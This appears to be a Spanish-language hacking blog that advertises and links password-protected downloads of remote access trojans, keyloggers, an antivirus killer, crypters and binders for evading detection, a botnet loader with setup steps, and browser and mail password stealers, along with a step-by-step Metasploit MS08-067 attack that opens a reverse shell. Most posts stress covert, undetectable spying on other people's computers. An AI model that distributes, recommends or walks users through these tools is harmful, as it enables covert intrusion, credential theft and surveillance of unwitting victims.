TROYANOSYVIRUS.COM.AR

ProSpy RAT 2012 - Privado

2012-05-30T22:21:00.001-03:00

ProSpy RAT es una aplicacion diseñada para monitorear y administrar computadoras remotamente de forma totalmente invisible y anonima. Con ProSpy RAT basicamente obtienes control total en tiempo real sobre cualquier PC remota donde se ejecute el servidor del mismo. Puedes ver y controlar todo lo que se realiza en una o varias PCs desde tu propia PC sin que nadie se entere.

Herramientas

Administrador de archivos
Captura de pantalla
Captura de camara
Captura de entrada de audio
Keylogger Online y offline
Shell remota
Enviar teclas
Administrar MSN
Administrar portapapeles
Bromas
Contraseñas
Descargar/Descargar y ejecutar
Enviar mensaje
Visitar web
Crear script (bat, vbs, html, etc..)
Enviar comando shell
Leer registro
Opciones de energia
Opciones de servidor
Informacion de sistema
Procesos activos
Ventanas activas
Aplicaciones instaladas
Extractor de correos de MSN

Imagenes

Caracteristicas del cliente

Vistas en miniaturas de los escritorios o ventana activa
Sistema de conexion inversa mediante sockets con trafico encriptado
Sin limites de conexiones
Estable y rapido
Multitarea
Difundir (para enviar tareas a varios usuarios al mismo tiempo)
Seleccionar usuarios
Filtrar ips
Automatismo
Carpeta de descarga para cada usuario
Sistema de logs y estadisticas completo
Muestra ventanas activas de los usuarios remotos
Cliente NO-IP integrado
De uso muy intuitivo y totalmente es español
Cambiar icono
Cambiar extension y nombre del servidor
Clonar informacion de archivo
Escaner de puertos
Informacion en linea
Encriptacion con VM protect
Escaner de puertos

Caracteristicas del servidorhttp://www.blogger.com/img/blank.gif

Compatible con windows Me, XP, 2000, Vista, Seven, etc (32 y 64 bits)
Totalmente invisible para el usuario
Se inicia el ejecutar windows
Saltea la UAC de Windows Vista y Seven
Saltea los firewalls y antivirus
Extensiones soportadas: ".scr", ".pif", ".com" y ".exe"
Deteccion de errores
Posibilidad de modificar (encriptar, cambiar icono, juntar con otro archivo, etc)
2 DNS/IP y puertos
Mutex
Peso del servidor: 160Kb sin comprimir (menos de lo que ocupa una imagen de tamaño normal)

Actualizacion version V2.2 con visor de contraseñas (Mayo del 2012)
En esta nueva version se agrego un visor de contraseñas remotas, y se realizaron otros cambios menores, puedes ver todos los cambios en la pagina oficial.

Video demostracion

Soporte tecnico / Asistencia remota
Para usar ProSpy RAT no es necesario que seas un experto en el tema, si quieres te lo configuramos remotamente asi lo tienes listo para usar sin ningun costo adicional. Recibiras el soporte que necesites para usar el programa, asi que no tienes por que preocuparte.

Informacion del producto

Producto: ProSpy RAT V2.2 2012 FULL (mayo del 2012)
Pagina oficial: www.prospy-rat.com
Precio: 155 Euros (199 dolares o equivalente en moneda local)
Entrega del producto: Via Email dentro de las 24 horas despues de haber recibido el pago.
Contacto: Escribenos mediante el Formulario de contacto. O envianos un email a prospy.rat@gmail.com. Te responderemos dentro de las 24 horas.

Comprar
Si estas interesado en la compra y necesitas los datos para realizar el pago o tienes alguna pregunta contactanos mediante el Formulario de contacto de la pagina oficial o envia un mail a prospy.rat@gmail.com y te contactaremos dentro de las proximas 24 horas, no dudes en hacernos las preguntas que desees sin ningun compromiso de compra.

La unica forma de realizar la compra de ProSy RAT es mediante la pagina oficial www.prospy-rat.com

Recibes con la compra

ProSpy RAT V2.2 2012 Full (ultima version) con licencia ilimitada de por vida para usar en cualquier PC. Con usuario y contraseña unico por cliente.
Soporte tecnico remoto: Te ayudamos a configurar y usar el programa y si quieres te lo dejamos listo para usar.
Actualizaciones de cliente gratuitas durante 6 meses. En caso de agregarse nuevas herramientas o funciones.
Garantia de 6 meses de recambio de servidor en caso de hacerse detectado.
Instrucciones en español para configuracion y puesta en marcha del programa.
Enlace de descarga unico por cliente alojado en nuestros servidores durante 1 año o el tiempo que mantenga las actualizaciones. Para que nunca pierdas el programa y lo descargues cuando desees.

Contactar
Si estas interesado en la compra y necesitas los datos para realizar el pago o tienes alguna pregunta contactanos mediante el Formulario de contacto de la pagina oficial o envia un mail a prospy.rat@gmail.com y te contactaremos dentro de las proximas 24 horas, no dudes en hacernos las preguntas que desees sin ningun compromiso de compra.

Para mas informacion visita la web oficial www.prospy-rat.com

Iceberg Generator Tool V.Beta

2012-04-14T20:23:00.006-03:00

Iceberg Generator Tool es un Killer de programas de seguridad creado por Sanko y Slore.
Esta diseñada para deshabilitar los programas de proteccion mas conocidos y evitar que se actualizen o ejecuten.

Caracteristicas:

- Melt (Elimina el archivo al ejecutarlo)
- Persistencia en autoinicio
- Mata algúnos softwares de protección.
- Oculta procesos en el administrador de tareas
- Apagado el pc al tratar de borrar el archivo
- Encriptable

Instalar dependencia
El programa utiliza una dependencia, si al intentar abrirlo les da un error deben instalarla.
Para instalarla deben abrir el archivo "Register.exe" ubicado en la carpeta "Codejock" de la descarga, luego le dan click en "Register". Eso es todo, ahora deberia abrir bien el programa.

Modo de uso
Su uso es muy simple solo seleccionan el programa que desean deshabilitar y se generara un archivo en la carpeta donde se encuentra el Iceberg Generator, ese archivo (killer) es el que matara el proceso.
Pueden generar uno o varios Killers o todos en un solo archivo.

Video:

Esta es una version beta y como es de suponer tiene algunas fallas, pero funciona muy bien con la mayoria de los antivirus.

¡ADVERTENCIA: NO EJECUTAR EN SUS PCS LOS ARCHIVOS QUE GENERA. USAR SOLO EN PCS DE PRUEBA!

Descarga:
Iceberg Generator Tool V.Beta - (Descarga directa Tuchost.com)

Contraseña del rar: troyanosyvirus.com.ar

Facebook Password Decryptor

2012-03-17T08:24:00.006-03:00

Facebook Password Decryptor es una aplicacion de SecurityXploded que permite recuperar las contraseñas guardadas de Facebook en los navegadores y mensajeros mas conocidos.

Esta aplicacion solo funciona cuando se usa la opcion "Recordar contraseña" en los navegadores o mensajeros.
Lo que hace el programa es buscar estas contraseñas guardadas y desencriptarlas para luego mostrarla en pantalla.

La aplicacion funciona en modo grafico o en modo consola.

Facebook Password Decryptor recupera las contraseñas de las siguientes aplicaciones:

- Internet Explorer
- Firefox
- Google Chrome
- Opera
- Apple Safari
- Flock Browser
- Paltalk Messenger
- Miranda Messenger

Su modo de uso es muy simple, solo hay que abrir el Facebook Password Decryptor y luego dar click en "Start recovery"

Descarga ultima version (Febrero 2012):
Facebook Password Decryptor 2.0 - (Descarga directa desde Tuchost sin publicidad)
Facebook Password Decryptor 2.0 - (Descarga desde pagina oficial con publicidad)
Contraseña: troyanosyvirus.com.ar

Pagina oficial: http://securityxploded.com

Accediendo a Windows XP desde BackTrack 5 utilizando Metasploit

2012-02-21T19:59:00.021-03:00

En este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de como iniciar Backtrack 5 desde un CD.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

ifconfig

Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255

Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

msfconsole

Nos saldra algo asi:

4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3

8- Enviamos el exploit:

exploit

Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

exploit

Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4

msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit

Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

Links de interes:
Video de youtube: Exploiting windows xp with BackTrack 5 using metasploit
Curso de Metasploit Unleashed en Español

Comenten sus experiencias

Ardamax Keylogger 3.8.9

2011-12-15T02:35:00.006-03:00

Ardamax Keylogger es uno de los keyloggers mas conocidos, sirve para capturar las teclas pulsadas en una o varias PCs.
El año pasado se publico la version 3.8 en troyanosyvirus, hoy les traigo la ultima version, la 3.8.9, con nuevas mejoras como por ejemplo la captura de teclas en Google Chrome, Captura de camara web, correcion de bugs, etc.

Caracteristicas principales:
-Envio de logs via Email
-Envio de logs via FTP
-Envio de logs a traves de la red lan
-Registra portapapeles
-Modo invisible
-Vigilancia del PC (captura de pantalla)
-Registra, fecha, hora, ventana activa y aplicacion
-Registra caracteres unicode
-Contraseña de seguridad
-Registra conversciones de chat de los siguientes programas: MSN, Windows Live, Messenger 2011, ICQ 7, Skype 4, Yahoo Messenger 10, Google Talk, Miranda, QIP 2010.

Otras características:
-Compatible con windows 2000/2003/XP/Vista/7
-Multi usuario
-Inicio automático
-Interfaz amigable
-Fácil de instalar

Descarga
Ardamax Keylogger 3.8.9 - (Descarga directa TucHost)
Contraseña del rar: troyanosyvirus.com.ar

Ardamax Keylogger 3.8.9 - (Descarga oficial)

Mail PassView v1.77

2011-10-13T02:12:00.003-03:00

Mail PassView (mailpv) es un programa creado por NirSoft que captura las contraseñas guardadas de los clientes de correos mas conocidos.

Captura contraseñas guardadas de los siguientes programas:

- Outlook Express
- Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
- Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
- Windows Mail
- Windows Live Mail
- IncrediMail
- Eudora
- Netscape 6.x/7.x (Si la contraseña no esta encriptada con una clave maestra)
- Mozilla Thunderbird (Si la contraseña no esta encriptada con una clave maestra)
- Group Mail Free
- Yahoo! Mail - Si la contraseña esta guardada en la aplicacion Yahoo Messenger.
- Hotmail/MSN mail - Si la contraseña esta guardada en la aplicacion MSN/Windows/Live Messenger
- Gmail - Si la contraseña esta guardada en la aplicacion Gmail Notifier, Google Desktop, o en Google Talk.

Recordar que solo captura las contraseñas guardadas. Si las contraseñas no estan guardadas se deberia utilizar un keylogger.
Tambien puede ser usado mediante linea de comandos, para ver los comandos visitar la web oficial.

Pagina oficial: www.nirsoft.net

Descarga:
Mail PassView v1.77 - (Descarga directa TucHost)
contraseña del rar: troyanosyvirus.com.ar
Mail PassView v1.77 - (Pagina oficial)

Libro: Hacking Etico

2011-08-08T05:39:00.006-03:00

Hacking Etico es un libro de seguridad informática escrito por el argentino Carlos Tori que cuenta con 328 páginas redactadas con un lenguaje simple y ordenado.
El libro abarca una gran variedad de temas muy bien explicados y desarrollados: Ingeniería Social, Fuerza Bruta, Inyección de código SQL, Seguridad en Servidores Windows y Linux y muchos temas más.

Anteriormente "Hacking etico" era comercial y se agotaron las ventas en Argentina por lo que su escritor lo decidio liberar.

Contenido:
Capítulo 1: Hacking Ético
Capítulo 2: Recabar información
Capítulo 3: Ingeniería Social
Capitulo 4: Fuerza Bruta
Capitulo 5: Aplicación Web
Capitulo 6: Inyección de código SQL
Capitulo 7: Servidores Windows
Capitulo 8: Servidores Linux
Capitulo 9: Algunos conceptos finales

Muy recomendado para quien se quiere iniciar en el tema.

Descarga:
Hacking Etico - Por Carlos Tori - (Descarga directa TucHost)
Password: troyanosyvirus.com.ar
Hacking Etico - Por Carlos Tori - (Descarga 4shared link oficial)

Ver online: issuu.com
Pagina oficial: www.hackingetico.com

VertexNet-Loader

2011-06-21T20:33:00.007-03:00

VertexNet es un botnet/loader programado en c++ por el frances DarkCoderSc. Sirve para controlar PCs mediante comandos desde un panel web.
La ventaja de este programa de administracion remota es que puedes administrar las pcs remotas desde cualquier navegador web como puede ser Firefox, Opera o Chrome, obteniendo asi un mejor anonimato.

Sus funciones basicas son:

-Descargar archivo
-Ejecutar
-Enviar mensaje
-Keylogger
-DDOS simple
-Shell remota
-Leer archivo
-Desinstalar
-Visitar pagina web
-Actualizar servidor

Puesta en marcha:
VertexNet funciona igual que las otras botnet como zeus, y se necesita algo de conocimientos basicos de web para poder configurarlo y dejarlo funcionando.

1- Conseguir un host que soporte php y mysql para subir el panel web, puede ser uno gratuito o pago.
2- Crear un usuario y una base de datos en mysql.
3- Importar las tablas: Logueate en tu panel mysql en tu host, busca importar en la pagina principal y en donde dice "archivo a importar" seleccionas el archivo "Web Panel\SQL\vertexnet.sql" de tu pc, despues preciona en continuar y deberia aparecer algo asi: "La importación se ejecutó exitosamente, se ejecutaron 12 consultas".
4- Modificar el archivo "Web Panel\inc\connection.inc.php" con los datos de conexion de la base de datos y guardarlo.
5- Subir todos los archivos del panel web al host.
6- Abrir el VNBuilder.exe modificar los datos de la web y generar el server.

Usuario y contraseña para ingresar al panel web:
Usuario: root
Contraseña: toor

No recomendado para usuarios muy principiantes!

Descarga:
VertexNet-Loader 1.2.1 - (Descarga directa TucHost)
VertexNet-Loader 1.2.1 - (Descarga pagina oficial)
Contraseña: troyanosyvirus.com.ar

Pagina oficial: http://vertexnet-loader.com

Revealer Keylogger free

2011-06-06T17:20:00.005-03:00

Revealer Keylooger es un simple keylogger que te permite controlar y grabar todas las teclas que se introducen en una PC. Textos como páginas web, conversaciones e incluso usuarios y contraseñas.

Cada uno de los registros está clasificado e identificado con su fecha de creación, el proceso o aplicación en la que se ha introducido el texto, un título descriptivo y el texto en sí.

Esta version tiene un modo invisible, pero NO soporta el envio remoto de logs. Si quieren algo remoto gratuito usen Advanced Logger v.1.

De muy facil uso, recomendado para principiantes.

Descarga
Revealer Keylogger 1.4 - (Descarga directa TucHost)
Revealer Keylogger 1.4 - (pagina oficial)
contraseña: troyanosyvirus.com.ar

Xtreme RAT v2.6

2011-05-09T02:23:00.007-03:00

Ayer salio la nueva version del Xtreme RAT programado en Delphi supuestamente por xtremecoder usuario de la comunidad OpenSC.ws.
En esta ultima version se agregaron las siguientes funciones: Administrar MSN, Proxy, Ping, keylogger mejorado, entre otros cambios menores.

Es un programa de administracion remota bastante completo y compatible con windows Vista y Seven, pero es detectado por los antivirus ya que al programarlo no se tuvo en cuenta este punto, algo que hoy en dia es muy importante.

Descarga:
Xtreme RAT v2.6 - (Descarga directa TucHost)
Contraseña: troyanosyvirus.com.ar

---------------------------------------------------------------------------

Si quieres algo mucho mejor, privado, mas estable, indetectable, con mas herramientas, asistencia remota para utilizarlo y mucho mas recomiendo PROSPY RAT 2012 --> www.prospy-rat.com

Web Browser Pass View v1.05

2011-04-15T01:06:00.005-03:00

WebBrowserPassView es una herramienta creada por NirSoft que sirve para recuperar las contraseñas guardadas de los navegadores mas conocidos. Basicamente es una combinacion de las ya conocidas herramientas de Nirsoft para recuperar contraseñas y actualizada con las nuevas versiones.
Muy util para recuperar las contraseñas de sitios como Facebook, Yahoo, Google, GMail, etc.

Caputra contraseñas de:
-Internet Explorer (versión 4.0 - 8.0)
-Mozilla Firefox (todas las versiones)
-Google Chrome
-Opera

Requisitos de sistema y limitaciones
1- Esta utilidad funciona en cualquier versión de Windows desde Windows 2000 hasta Windows 7, incluidos los sistemas de 64 bits. Las versiones anteriores de Windows (Windows 98/ME) no son compatibles, ya que esta utilidad es una aplicación Unicode.
2- Actualmente, WebBrowserPassView no puede recuperar las contraseñas cifradas con una contraseña maestra. En proximas versiones probablemente se mejore esto.
3- En Internet Explorer 7.0 hasta 9.0, las contraseñas se cifran con la URL del sitio Web, WebBrowserPassView utiliza el historial de Internet Explorer para descifrar las contraseñas. Si elimina o desactiva el historial de Internet Explorer, WebBrowserPassView no será capaz de descifrar las contraseñas.
4- En Google Chrome las contraseñas que son originalmente importadas desde Internet Explorer 7.0 hasta 9.0, no se pueden descifrar.

Descarga
WebBrowserPassView v1.05 (Descarga directa TucHost)
WebBrowserPassView v1.05 (pagina oficial)
contraseña: troyanosyvirus.com.ar

Advanced Logger v.1

2011-03-15T04:50:00.007-03:00

Advanced Logger es un keylogger (captura las teclas pulsadas) que envia los logs mediante una pagina php y los guarda en archivos *.html.
Captura todas las teclas pulsadas aunque la PC este desconectada de internet, sube los logs instantaneamente mientras este conectada.

Modo de uso
1- Subir el archivo index.php en algun host que soporte permisos de escritura.
2- Darle permisos 777 al archivo index.php (se creara automaticamente un archivo .html).
3- Colocar la url donde se encuentra el archivo index.php en el "Advanced logger builder" y hacer click en "Build server". Se generara el servidor del keylogger.
4- Eso es todo ahora solo deben ejecutar el server.exe en las PCs que se quiera capturar las teclas pulsadas. Los logs apareceran en la carpeta donde subieron el index.php con el nombre del usuario de la PC. Lo pueden descargar y ver con cualquier navegador de internet.

Descarga
Advanced Logger v.1 - (Descarga directa TucHost)
Advanced Logger v.1 (Rapidshare)
Advanced Logger v.1 (Megaupload)
Advanced Logger v.1 (FreakShare)
Contraseña: troyanosyvirus.com.ar

LostDoor J-Revolution v6

2011-02-16T00:21:00.006-03:00

Hoy salio la nueva version del LostDoor de OussamiO. En esta nueva version se cambio la apariencia, se mejoro la estabilidad y ya no pierde usuarios remotos como en versiones anteriores.

Cambios:

Lost Door v6 2011

[+] GUI cambiada
[+] Bug de Webcam reparados
[+] Abrir paginas web en el navegador por defecto
[+] Pequeños bugs corregidos
[+] keylogger mejorado
[+] Opcion Upload corregida
[+] Download & Run agregado
[-] Chnage icon eliminado

Descarga:
LostDoor J-Revolution v6 (Descarga directa TucHost)
LostDoor J-Revolution v6 (megaupload)
LostDoor J-Revolution v6 (rapidshare)
LostDoor J-Revolution v6 (badongo)
Contraseña: troyanosyvirus.com.ar

---------------------------------------------------------------------------

Si quieres hackear con algo mucho mejor, privado, mas estable, indetectable, con mas herramientas, asistencia remota para utilizarlo y mucho mas recomiendo PROSPY RAT 2012 --> www.prospy-rat.com

Indetectables Offset Locator 2.6

2011-02-02T03:47:00.004-03:00

Hoy les traigo la nueva version del Indetectables Offset Locator programado por Mingo de la comunidad Indetectables, un programa que sirve para encontrar los offset detectados por los antivirus de un archivo, esta nueva version incluye nuevas funciones y algunas correcciones de bugs.

Los metodos principales que utiliza para encontrar los offset son los basados en los siguientes programas:

-AvFucker
-DSplit
-SignatureZero (acorralar firma)

Por ahora no existe alguna manual del programa pero el funcionamiento es similar al de cualquier buscador de offset.
A los principiantes no les recomiendo este programa, les recomiendo visitar el siguiente enlace --> http://troyanosyvirus.com.ar/2008/03/video-dejando-indetectable-el-poison.html

Descarga
Indetectables Offset Locator 2.6 (Descarga directa TucHost)
Indetectables Offset Locator 2.6 (rapidhsare)
Indetectables Offset Locator 2.6 (megaupload)
Indetectables Offset Locator 2.6 (badongo)

Password: troyanosyvirus.com.ar

DarkComet RAT 3.0.1

2010-12-31T08:34:00.006-03:00

Esta es la nueva version del ya conocido DarkComet RAT, una herramienta de administracion remota creada por DarkCoderSc.
Esta version es mucho mas estable y funciona perfectamente en windows Vista y 7, a diferencia de sus primeras versiones liberadas en 2008 que eran muy poco estables.

En la siguiente imagen se puede ver el centro de control donde tiene todas las herramientas para administrar las PCs remotas.

Trailer oficial

Descarga
DarkComet-RAT 3.0.1 (Descarga directa TucHost)
DarkComet-RAT 3.0.1 (pagina oficial)
DarkComet-RAT 3.0.1 (rapidshare)
DarkComet-RAT 3.0.1 (megaupload)

Password: troyanosyvirus.com.ar

Pagina oficial: www.darkcomet-rat.com

Recuva - Recuperador de archivos

2010-12-09T04:29:00.004-03:00

Recuva es una pequeña aplicacion que nos permite recuperar los archivos que fueron borrados de alguna unidad de almacenamiento. Funciona inclusive después de vaciar la papelera de reciclaje o de formatear.

Este programa recupera fácil y rápidamente todo tipo de archivos, imágenes, archivos comprimidos, documentos, etc. Con recuva también podemos rescatar las fotos borradas de nuestra cámara digital o los archivos mp3 de nuestro reproductor portátil. La utilización de este programa es sumamente sencilla y los resultados que podemos obtener son realmente sorprendentes recuperando archivos que creíamos perdidos.

Hay que aclarar que no siempre se pueden recuperar el 100% de los archivos borrados pero vale la pena probarlo, seguramente nos sacará de más de un apuro.

Pagina oficial: www.piriform.com

Descarga:
Recuva - Recuperador de archivos v1.38 (pagina oficial)
Recuva - Recuperador de archivos v1.38 (rapidshare)

NovaLite II 2.6

2010-11-11T02:41:00.004-03:00

Este es un simple troyano programado por omc, de la comunidad HH, tiene las herramientas basicas pero es estable.

Caracteristicas:
-Captura de pantalla
-Administrador de archivos, ventanas, procesos y servicios
-Editor de registro
-Informacion de la pc
-Shell remota
-Simple keylogger
-Downloader con la posibilidad de descargar en todas las pcs

Aclaracion: El servidor es algo detectado por los antivirus, y puede ser que el cliente sea detectado, ya que el servidor se encuentra dentro del mismo.

Dentro de poco se espera la nueva version, la cual sera publicada en este mismo post.

Descarga
NovaLite II 2.6 (en) (Descarga directa TucHost)
NovaLite II 2.6 (en) (rapidshare)
NovaLite II 2.6 (en) (megaupload)

Pass: troyanosyvirus.com.ar

Abronsius Code Obfuscator

2010-10-14T09:27:00.006-03:00

ACO es una herramienta creada por Abronsius para programadores de Visual basic 6 que sirve para ofuscar el codigo fuente de un programa. Ofuscando el codigo fuente se puede mejorar la indetectabilidad de un programa frente a los antivirus.

Ademas del ofuscador de codigo el programa incluye un crypter con generador de stubs unicos, escaner de antivirus, analisis de detecciones, compilador, y otras herramientas mas. Es una de las mejores herramientas de este tipo.

Lo que mas se destaca de este programa es la calidad y cantidad de herramientas que tiene para ofuscar el codigo para dejar indetectable un programa de forma muy rapida.

Es una herramienta bastante avanzada y solo les servira a quienes saben programar en VB6 fluidamente.

Descarga:
[ACO] v3.0 (rapidshare)
[ACO] v3.0 (megaupload)
Pass: troyanosyvirus.com.ar

Para mas informacion recomiendo visitar el post oficial en HH:
http://www.hackhound.org/forum/index.php?topic=42713.0

SocketSniff v1.07

2010-09-16T00:30:00.002-03:00

SocketSniff es una aplicacion que permite ver la actividad del control winsock en un determinado proceso.
Todos los troyanos publicados en troyanosyvirus utilizan el control winsock para funcionar y con este programa puedes ver la informacion enviada y recibida junto con otro tipo de informacion por cada sock creado.

Su funcionamiento es muy simple solo se debe hacer click en el boton de "play" y despues seleccionar el proceso que se desea analizar.

Estas herramientas son usadas para buscar y tomar el control de redes de bots irc. Tambien para analizar un archivo y ver si conecta a otra ip y que datos envia.

Si lo van a utilizar con un server de troyano o un virus recomiendo usarlo en una maquina virtual ya que SocketSniff ejecuta el programa en la PC (no lo emula).

SocketSniff v1.07 (pagina oficial)
SocketSniff v1.07 (megaupload)
SocketSniff v1.07 (rapidshare)

Cammy v1.9.0.1 Webcam Spy

2010-08-18T16:23:00.005-03:00

Cammy es una pequeña aplicacion que captura remotamente la imagen de la webcam o del escritorio remoto. Esta diseñado para usar con otros programas de administracion remota que no poseen captura de camara.

Aunque es invisible no tiene opciones de ocultacion ni autoinicio con windows, por lo que casi no es detectado por los antivirus, es de conexion inversa y bastante rapido.

En la imagen siguiente se ve al programa capturando la imagen de una webcam virtual

Ideal para principiantes, o para usar con otro RAT. Al igual que otros programas de conexion inversa funciona con un servidor y un cliente.

Descarga:
Cammy v1.9.0.1 (descarga directa Tuchost)
Cammy v1.9.0.1 (rapidshare)
Cammy v1.9.0.1 (badongo)
Pass: troyanosyvirus.com.ar

GeoIP Tool v2 by Slek

2010-07-29T02:08:00.004-03:00

GeoIP Tool es una pequeña herramienta programada por Slek que obtiene el pais de una direccion ip. Solo basta con colocar la IP y despues click en el unico boton que tiene y obtendra el pais.

Descarga
GeoIP Tool v2 by Slek (rapidshare)
GeoIP Tool v2 by Slek (megaupload)
GeoIP Tool v2 by Slek (badongo)

DarkComet RAT 2.0 RC7

2010-06-16T23:13:00.004-03:00

Esta es la ultima version de la herramienta de administracion remota DarkComet creada en Delphi por el frances DarkCoderSc. El proyecto se inicio en junio del 2008 con el nombre SynRAT, y se fueron agregando funciones y mejorando la estabilidad hasta llegar a esta ultima version, la cual tambien es mucho mas estable y rapida aun al ser una version RC.

El DarkComet tiene casi todas las herramientas tipicas de estos RAT, como ser captura de pantalla, captura de camara, administrador de archivos, captura de audio, keylogger, captura contraseñas guardadas, informacion de sistema, bromas, administrar msn, etc...
Tambien posee la opcion de usar las pcs remotas como bots y realizar tareas en todas las pcs al mismo tiempo, entre ellas se destaca la posibilidad de realizar un ataque DDOS del tipo flood http.

Como dije anteriormente es una version RC o sea que todavia no esta terminada, por lo que podria tener algunos errores pequeños, aunque yo no le encontre ninguno.

Descarga:
DarkComet RAT 2.0 RC7 (megaupload)
DarkComet RAT 2.0 RC7 (rapidshare)
DarkComet RAT 2.0 RC7 (badongo)
Pass: troyanosyvirus.com.ar

eXpress TimeStamp Toucher 1.1.0

2010-05-11T23:56:00.003-03:00

eXpress TimeStamp Toucher es un programa que permite cambiar los atributos de la fecha y hora de archivos y carpetas, esta version tambien soporta subcarpetas.
Permite cambiar valores de la fecha y hora de creacion, de la ultima modificacion y del ultimo acceso.

Es un programa muy util para tener a mano, por ejemplo puede servir cuando modificamos un archivo antiguo y no queremos que alguien se entere de que fue modificado a ultimo momento. O para generar archivos y colocarle una fecha anterior a la creada, o si accedieron a ese archivo modificarle la fecha del ultimo acceso para borrar rastros, etc.

Descarga
eXpress TimeStamp Toucher 1.1.0 (pagina oficial)
eXpress TimeStamp Toucher 1.1.0 (prapidshare)
Pass: troyanosyvirus.com.ar

Soprano 3 Binder Runtime

2010-04-22T00:46:00.005-03:00

Esta es la nueva version del binder creado por Shadehack. En este caso es runtime, lo que quiere decir que al ejecutar el archivo encriptado o juntado con el soprano se desencripta en memoria, por lo tanto se saltea a los antivirus cuando escanean la pc en tiempo real. Funciona tambien como un encriptador runtime.

Metodos de encriptacion:
RC4
Crypt Api
XOR

Deja los archivos indetectables al dia de hoy. El BinderSoprano V3.0.exe puede ser detectado por los antivirus porque posee los 3 metodos de encriptacion en su codigo y esto es muy detectado. Pero el stub no, que es lo importante.

Descarga
Soprano 3 Binder Runtime (megaupload)
Soprano 3 Binder Runtime (rapidshare)
Soprano 3 Binder Runtime (badongo)
Pass: troyanosyvirus.com.ar

Bifrost Attacker v1.1 Beta

2010-04-05T00:20:00.004-03:00

Bifrost Attacker es un flooder para bifrost, sirve para cerrar el cliente de un bifrost remoto saturandolo de conexiones. Es ideal para cuando sabemos que alguien nos quizo infectar o nos infecto con el troyano bifrost, colocando la ip o no-ip del atacante.

Para usarlo solo se coloca la ip y puerto de quien esta usando bifrost y despues click en "attack". La ip y el puerto lo podemos obtener con algun programa que desencripte el EOF del bifrost como el "sacacorchos", con el comando "netstat" en ms-dos, o con cualquier programa que analize las conexiones de red.

Descarga
Bifrost Attacker v1.1 Beta (rapidshare)
Bifrost Attacker v1.1 Beta (filefactory)
Bifrost Attacker v1.1 Beta (megaupload)
pass: troyanosyvirus.com.ar